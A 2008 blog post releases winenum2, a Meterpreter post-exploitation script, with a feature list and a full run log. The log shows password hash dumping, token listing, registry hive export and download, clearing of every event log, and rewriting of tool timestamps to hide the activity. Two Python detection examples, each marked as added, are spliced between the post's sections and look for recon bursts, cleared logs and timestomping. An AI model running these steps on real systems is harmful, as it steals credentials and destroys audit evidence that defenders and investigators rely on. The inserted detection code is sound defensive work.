Sunday, Nov 30, 2008

Re-Wrote Winenum and added New Features to it

I just re-wrote the entire script and made it more modular, with better error handling, and added anti-forensic features (optional, depending on the Rules of Engagement). I also added a check that detects whether the target machine is a VMware or VirtualBox VM (Hyper-V and Citrix Xen will be added soon). The script has to be placed in the scripts/meterpreter/ folder in the root of the Metasploit folder to be usable.

http://www.darkoperator.com/winenum2.rb.tar.gz

The script will do the following:

Execute on the host and get the output for:

* set
* arp -a
* ipconfig /all
* ipconfig /displaydns
* route print
* net view
* netstat -na
* netstat -ns
* net share
* net view
* net group
* net user
* net localgroup
* net view /domain
* netsh firewall show config
* wmic computersystem list
* wmic useraccount list
* wmic group
* wmic service list brief
* wmic volume list brief
* wmic process list brief
* wmic startup list full
* wmic qfe

It will also:

* Check if the target machine is a VMware or VirtualBox VM
* Run the Meterpreter hashdump
* List all tokens on the server that can be used with Incognito
* Export, compress and download all registry hives
* Clear all event logs
* Change the MACE (Modified, Accessed, Created, Entry-modified) timestamps of the executables used on the host.
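From the defender's side, the feature list above doubles as a detection checklist: a run of built-in enumeration tools on one host within seconds, followed by an event-log-cleared record (the script's own output notes that it leaves event 517 behind). The Python below is an added example, not part of this post or of winenum2; the log layout, host names and sample lines are constructed for it, and the event IDs are the standard Windows ones.

```python
"""Detection logic, run over constructed sample log lines, for the host-side
behaviour described above: a burst of built-in enumeration commands on one
host followed by an event-log-cleared record."""
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# Event IDs that record a cleared log: 517 (Security log on Windows XP/2003,
# the event the script's own output mentions), 1102 (Security log, Vista and
# later) and 104 (System log, Vista and later).
LOG_CLEARED_IDS = {517, 1102, 104}

# Process-creation event IDs: 592 (XP/2003) and 4688 (Vista and later).
PROCESS_CREATED_IDS = {592, 4688}

# Built-in tools behind the command list above.  Many distinct ones from one
# host inside a short window is the enumeration signature worth alerting on.
RECON_IMAGES = {"arp.exe", "ipconfig.exe", "route.exe", "net.exe",
                "netstat.exe", "netsh.exe", "wmic.exe", "tasklist.exe"}

RECON_THRESHOLD = 6                  # distinct recon tools ...
RECON_WINDOW = timedelta(minutes=5)  # ... within this window on one host

# Constructed sample log in a simplified "<ISO time>|<host>|<event id>|<detail>"
# layout (not a real Windows export); detail carries the command line for
# process-creation events.
SAMPLE_LOG = """\
2008-11-30T18:10:02|WINXPVM01|592|cmd.exe /c set
2008-11-30T18:10:03|WINXPVM01|592|arp -a
2008-11-30T18:10:04|WINXPVM01|592|ipconfig /all
2008-11-30T18:10:05|WINXPVM01|592|route print
2008-11-30T18:10:06|WINXPVM01|592|net view
2008-11-30T18:10:07|WINXPVM01|592|netstat -na
2008-11-30T18:10:09|WINXPVM01|592|netsh firewall show config
2008-11-30T18:10:11|WINXPVM01|592|C:\\WINDOWS\\system32\\wbem\\wmic.exe qfe
2008-11-30T18:10:40|WINXPVM01|517|The audit log was cleared
2008-11-30T18:12:00|FILESRV02|592|net use
2008-11-30T18:45:00|FILESRV02|592|ipconfig /all
"""


def parse_log(text):
    """Turn the sample layout into (time, host, event_id, detail) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, event_id, detail = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), host, int(event_id), detail))
    return events


def image_name(command_line):
    """Normalise the executable of a command line to 'name.exe' in lower case."""
    parts = command_line.split()
    if not parts:
        return ""
    name = ntpath.basename(parts[0]).lower()
    return name if name.endswith(".exe") else name + ".exe"


def find_log_clearing(events):
    """Return (time, host, event_id) for every log-cleared event."""
    return [(t, h, e) for t, h, e, _ in events if e in LOG_CLEARED_IDS]


def find_recon_bursts(events):
    """Return one (host, start, end, tools) per host on which at least
    RECON_THRESHOLD distinct recon tools ran within RECON_WINDOW."""
    per_host = defaultdict(list)
    for t, h, e, detail in events:
        if e in PROCESS_CREATED_IDS and image_name(detail) in RECON_IMAGES:
            per_host[h].append((t, image_name(detail)))
    bursts = []
    for host, runs in per_host.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):
            window = [(t, img) for t, img in runs[i:] if t - start <= RECON_WINDOW]
            tools = tuple(sorted({img for _, img in window}))
            if len(tools) >= RECON_THRESHOLD:
                bursts.append((host, start, window[-1][0], tools))
                break  # one alert per host is enough
    return bursts


def analyse(text=SAMPLE_LOG):
    """Run both checks over a log text and return the findings by kind."""
    events = parse_log(text)
    return {"log_cleared": find_log_clearing(events),
            "recon_bursts": find_recon_bursts(events)}


if __name__ == "__main__":
    for kind, hits in analyse().items():
        print(kind)
        for hit in hits:
            print("   ", hit)
```

On the constructed sample, WINXPVM01 trips the burst rule at seven distinct tools in eight seconds and then produces the 517 record; FILESRV02 runs two tools half an hour apart and stays quiet. The threshold and window are the knobs to tune against a baseline of what administrators on the network actually run.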

Here is some output from Meterpreter:

meterpreter > run winenum2
Windows Local Enumerion Meterpreter Script by Darkoperator
Carlos Perez carlos_perez@darkoperator.com
Usage:

-h This help message.

-a Run all commands including clearing event log and changing the
Changing Access Time, Modified Time and Created Time of executables
that where run on the target machine

-m Run all commands minus clearing the event logs and changing the MACE
of executables that where run in the target machine.
meterpreter >
meterpreter > run winenum2 -a
[*] Running Windows Local Enumeration Meterpreter Script by Darkoperator
[*] New session on 10.10.10.23:1149...
[*] Saving report to /tmp/10.10.10.23_20081130.270505021
[*] Checking if WINXPVM01 is a Virtual Machine ........
[*] This is a VMWare virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -na
[*] running command netstat -ns
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] Running WMIC Commands ....
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group
[*] running command wimic service list brief
[*] running command wimic volume list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*] Exporting HKCU
[*] Compressing HKCU into cab file for faster download
[*] Exporting HKLM
[*] Compressing HKLM into cab file for faster download
[*] Exporting HKCC
[*] Compressing HKCC into cab file for faster download
[*] Exporting HKCR
[*] Compressing HKCR into cab file for faster download
[*] Exporting HKU
[*] Compressing HKU into cab file for faster download
[*] Downloading HKCU.cab to -> /tmp/HKCU.cab
[*] Downloading HKLM.cab to -> /tmp/HKLM.cab
[*] Downloading HKCC.cab to -> /tmp/HKCC.cab
[*] Downloading HKCR.cab to -> /tmp/HKCR.cab
[*] Downloading HKU.cab to -> /tmp/HKU.cab
[*] Deleting left over files
[*] Clearing Event Logs, this will leave and event 517
[*] Clearing the security Event Log
[*] Clearing the system Event Log
[*] Clearing the application Event Log
[*] Clearing the directory service Event Log
[*] Clearing the dns server Event Log
[*] Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*] Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!
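The MACE step at the end of that output is the part a forensic examiner has to recognise afterwards. The following Python is an added example, not code from this post or from Metasploit; it applies the usual NTFS timestamp-consistency heuristics to constructed file records, and the field names and values are assumptions for illustration.

```python
"""Heuristics for spotting timestamp manipulation of the kind the script's
MACE step performs.  Records and values are constructed for this example; in
practice they come from an NTFS parser that exposes both $STANDARD_INFORMATION
and $FILE_NAME timestamps for each MFT entry."""
from dataclasses import dataclass
from datetime import datetime


@dataclass
class FileTimes:
    path: str
    si_created: datetime   # $STANDARD_INFORMATION times: what SetFileTime-style
    si_modified: datetime  # tools rewrite
    si_accessed: datetime
    fn_created: datetime   # $FILE_NAME creation time: kernel-maintained and not
                           # reachable through the documented file-time API


def check_file(rec):
    """Return (severity, reason) findings for one record; empty means clean."""
    findings = []
    # Strong signal: a $SI creation time earlier than the $FN creation time
    # does not arise from normal file operations.
    if rec.si_created < rec.fn_created:
        findings.append(("high", "$SI created before $FN created"))
    # Weak signal: NTFS keeps 100 ns precision; tools that write whole seconds
    # leave every sub-second field at zero.
    si_times = (rec.si_created, rec.si_modified, rec.si_accessed)
    if all(t.microsecond == 0 for t in si_times):
        findings.append(("low", "all $SI timestamps have zero sub-second part"))
    # Weak signal: created after modified.  Ordinary copies produce this too,
    # so it only corroborates the others.
    if rec.si_created > rec.si_modified:
        findings.append(("low", "$SI created after $SI modified"))
    return findings


def scan(records):
    """Map path -> findings for every record that has at least one finding."""
    report = {}
    for rec in records:
        findings = check_file(rec)
        if findings:
            report[rec.path] = findings
    return report


# Constructed records (hypothetical values, not real system timestamps).
SAMPLE_RECORDS = [
    # Timestamps pushed back to whole seconds in 2004 while the MFT entry
    # itself dates from 2008: the pattern a MACE rewrite leaves behind.
    FileTimes(r"C:\WINDOWS\system32\cmd.exe",
              datetime(2004, 8, 4, 12, 0, 0), datetime(2004, 8, 4, 12, 0, 0),
              datetime(2004, 8, 4, 12, 0, 0), datetime(2008, 6, 15, 9, 12, 33, 123456)),
    # Untouched system file: $SI and $FN agree, sub-second fields populated.
    FileTimes(r"C:\WINDOWS\system32\notepad.exe",
              datetime(2008, 6, 15, 9, 12, 33, 123456), datetime(2008, 6, 15, 9, 12, 33, 123456),
              datetime(2008, 11, 30, 18, 0, 1, 500000), datetime(2008, 6, 15, 9, 12, 33, 123456)),
    # Copied document: created after modified, but $SI and $FN creation agree.
    FileTimes(r"C:\Docs\report.doc",
              datetime(2008, 11, 20, 10, 0, 0, 250000), datetime(2008, 11, 1, 8, 30, 0, 40000),
              datetime(2008, 11, 30, 18, 0, 1, 500000), datetime(2008, 11, 20, 10, 0, 0, 250000)),
]

if __name__ == "__main__":
    for path, findings in scan(SAMPLE_RECORDS).items():
        print(path)
        for severity, reason in findings:
            print(f"   [{severity}] {reason}")
```

The $SI/$FN comparison is the one that carries weight: the file-time API only rewrites $STANDARD_INFORMATION, so a backdated creation time ends up older than the entry's own $FILE_NAME creation time. The other two checks are noisy on their own and are only reported as corroboration.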

I hope you guys find it useful.

Reader Comments (3)

Very interesting, I will try it right now, nice work!

February 28, 2009 | Unregistered Commenter Christian Martorella

Yeap!!! Great script! Just found your blog and am reading it.....

February 16, 2010 | Unregistered Commenter A

Dude U Rule...

February 19, 2010 | Unregistered Commenter God Bless You
